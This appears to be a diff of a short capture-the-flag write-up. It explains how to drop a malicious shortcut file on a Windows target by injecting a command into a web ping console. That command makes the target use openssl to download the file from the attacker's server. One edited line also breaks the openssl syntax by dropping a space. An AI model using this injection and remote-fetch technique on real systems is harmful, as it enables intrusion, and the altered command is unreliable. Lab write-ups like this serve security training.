We can find a login page in “/admin” port 9999.

 This does not output any message in the console but don’t worry.

-root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 136 < vs-mod.lnk
+root@kali:~# openssl s_server -quiet-key key.pem -cert cert.pem -port 136 < vs-mod.lnk

-# 10.10.14.23 | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:136 > "C:\Users\Public\Desktop\Shortcuts\vs-mod.lnk"
+# then, run following payload to upload shell on web ping console# 10.10.14.23 | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:136 > "C:\Users\Public\Desktop\Shortcuts\vs-mod.lnk"

 After that, we can confirm we have vs-mod.lnk in /shortcuts.